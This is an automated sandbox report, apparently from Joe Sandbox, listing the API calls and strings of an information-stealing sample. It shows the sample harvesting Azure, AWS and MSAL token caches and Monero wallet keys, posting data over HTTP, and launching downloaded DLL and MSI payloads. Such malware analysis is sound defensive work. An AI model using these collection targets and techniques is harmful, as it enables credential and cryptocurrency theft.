lstrcat.KERNEL32(?,0042141C), ref: 0040D057
lstrcat.KERNEL32(?,00000000), ref: 0040D06A
lstrcat.KERNEL32(?,00421420), ref: 0040D079
lstrcat.KERNEL32(?,00000000), ref: 0040D08C
lstrcat.KERNEL32(?,00421424), ref: 0040D09B
lstrcat.KERNEL32(?,00000000), ref: 0040D0AE
lstrcat.KERNEL32(?,00421428), ref: 0040D0BD
lstrcat.KERNEL32(?,00000000), ref: 0040D0D0
lstrcat.KERNEL32(?,0042142C), ref: 0040D0DF
lstrcat.KERNEL32(?,00000000), ref: 0040D0F2
lstrcat.KERNEL32(?,00421430), ref: 0040D101
lstrcat.KERNEL32(?,00000000), ref: 0040D114
lstrcat.KERNEL32(?,00421434), ref: 0040D123

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

lstrlenA.KERNEL32(?), ref: 0040D16A
lstrlenA.KERNEL32(?), ref: 0040D179
memset.MSVCRT ref: 0040D1C8

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

DeleteFileA.KERNEL32(00000000), ref: 0040D1F4

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 29b945626f68c31105a131f2cbd32939ce7866a55cde6a5eb70cc21d2076a16f
Instruction ID: ed6c437cbd46477d92e2fdf931dfcacd4144c719bc88927133304dc8b30d11c2
Opcode Fuzzy Hash: 29b945626f68c31105a131f2cbd32939ce7866a55cde6a5eb70cc21d2076a16f
Instruction Fuzzy Hash: 25E1A271901108ABCB14EBA0DC9AEEE7339AF54314F50415EF507B30A1DF786E99CB6A

Function 00414850 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414867

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414890
lstrcat.KERNEL32(?,\.azure\), ref: 004148AD

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

memset.MSVCRT ref: 004148F3
lstrcat.KERNEL32(?,00000000), ref: 0041491C
lstrcat.KERNEL32(?,\.aws\), ref: 00414939

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

memset.MSVCRT ref: 0041497F
lstrcat.KERNEL32(?,00000000), ref: 004149A8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 004149C5

Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
Part of subcall function 004143F0: lstrcat.KERNEL32(?,02736A08), ref: 0041452A
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611

memset.MSVCRT ref: 00414A0B

Strings

Z\A, xrefs: 004148D1, 0041495D, 004149E9, 00414A14, 004148D4, 00414960, 004149EC
\.azure\, xrefs: 004148A1
*.*, xrefs: 00414944
msal.cache, xrefs: 004149D0
\.IdentityService\, xrefs: 004149B9
Azure\.IdentityService, xrefs: 004149CB
Azure\.azure, xrefs: 004148B3
Azure\.aws, xrefs: 0041493F
*.*, xrefs: 004148B8
\.aws\, xrefs: 0041492D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-156850865
Opcode ID: feaf32fe5e0005e80deb5eb27391e339a5ee684120a0f08ff2884fcc7a8d2f57
Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
Opcode Fuzzy Hash: feaf32fe5e0005e80deb5eb27391e339a5ee684120a0f08ff2884fcc7a8d2f57
Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,0273B6D0), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DC3,00000000,?,?,00000000,?,",00000000,?,0273B790), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,0273B5E0,?,0273AD48,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

------, xrefs: 00404CB9
", xrefs: 00404C42
", xrefs: 00404D83
------, xrefs: 00404A0D
------, xrefs: 00404B78

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$??2@ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 594634378-2180234286
Opcode ID: 99d863c1059ccde65255e52e7717aee1a16a614fe282aeb84333fe0076362ff3
Instruction ID: 96828d9d4da3c69e3e13a7d192eb2c0d5cb14303612463eff3b0a86b38ab5adb
Opcode Fuzzy Hash: 99d863c1059ccde65255e52e7717aee1a16a614fe282aeb84333fe0076362ff3
Instruction Fuzzy Hash: 7B124E71912118AACB14EB91DC96FEEB339AF14314F50419EF50662091EF782F98CF6A

Function 00417DC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

RegOpenKeyExA.KERNEL32(00000000,027370C8,00000000,00020019,00000000,004205A6), ref: 00417E44
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
wsprintfA.USER32 ref: 00417EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

%s\%s, xrefs: 00417EED
- , xrefs: 00418043
?, xrefs: 00417E1A

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 6add8a66113190d9645630c8cd0e807f0befeaf7487910556c68bd84216a3432
Instruction ID: 7e933c005afce5063b6ac28d37290dd0de40035e7daa9b78ce1efab2f7c43410
Opcode Fuzzy Hash: 6add8a66113190d9645630c8cd0e807f0befeaf7487910556c68bd84216a3432
Instruction Fuzzy Hash: 3581197191111CABDB28DB54CC85FEAB7B9BF08314F0082D9E10AA6190DF756BC9CFA5

Function 004062D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,0273B6D0), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,0273AD48,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

GET, xrefs: 004063CC
ERROR, xrefs: 00406519
ERROR, xrefs: 00406457

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$??2@ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3871519372-2509457195
Opcode ID: d0e924f57c1beb30a5b030a3ad6e35492645f2bdf577a100fabd285ca18a4dec
Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
Opcode Fuzzy Hash: d0e924f57c1beb30a5b030a3ad6e35492645f2bdf577a100fabd285ca18a4dec
Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55

Function 00414FF0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415124
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415181
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415337

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00414CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00414DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E0F
Part of subcall function 00414DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E63
Part of subcall function 00414DA0: strtok.MSVCRT ref: 00414E7E
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E8E

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041526B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415420
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004154EC
Sleep.KERNEL32(0000EA60), ref: 004154FB

Strings

ERROR, xrefs: 00415173
ERROR, xrefs: 00415329
ERROR, xrefs: 00415116
ERROR, xrefs: 004154DE
ERROR, xrefs: 00415412
ERROR, xrefs: 0041525D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: cf0bc9cb0ab7c9d0c2509767102a41b1145292c8d9830008ad7be665b3d27f36
Instruction ID: 47717806d02ab2b23084bb80b202f8eeb65c1f88a6bcad5d58c416e3f74fe27f
Opcode Fuzzy Hash: cf0bc9cb0ab7c9d0c2509767102a41b1145292c8d9830008ad7be665b3d27f36
Instruction Fuzzy Hash: 1FE1A671901104AACB14FBB1EC57EED7339AF94314F40852EB40666192EF3C6B9DCB9A

Function 00412940 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

ShellExecuteEx.SHELL32(0000003C), ref: 00412CD5
ShellExecuteEx.SHELL32(0000003C), ref: 00412E6D
ShellExecuteEx.SHELL32(0000003C), ref: 00412FFA

Strings

<, xrefs: 00412FA0
/i ", xrefs: 00412EF4
C:\Windows\system32\rundll32.exe, xrefs: 00412E42
/passive, xrefs: 00412F6B
.dll, xrefs: 00412CF5
.msi, xrefs: 00412EA8
"" , xrefs: 00412BAA
C:\Windows\system32\msiexec.exe, xrefs: 00412FCF

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: b13b4fd25ad54199653cb639ff119c001ceae5743cecc2d520bf9aadeb5b3211
Instruction ID: f1658c825a9884a12c356146fd8d4c6d848a61a952cd10e5c69c9f5a52c1d3c9
Opcode Fuzzy Hash: b13b4fd25ad54199653cb639ff119c001ceae5743cecc2d520bf9aadeb5b3211
Instruction Fuzzy Hash: FA121F71811108AACB14FBA1DC96FDEB778AF14314F40415EF40666192EF782BD9CFAA

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcat.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcat.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,02718CD0,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

.keys, xrefs: 0040136B
\Monero\wallet.keys, xrefs: 0040138D
wallet_path, xrefs: 00401330
SOFTWARE\monero-project\monero-core, xrefs: 00401335

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
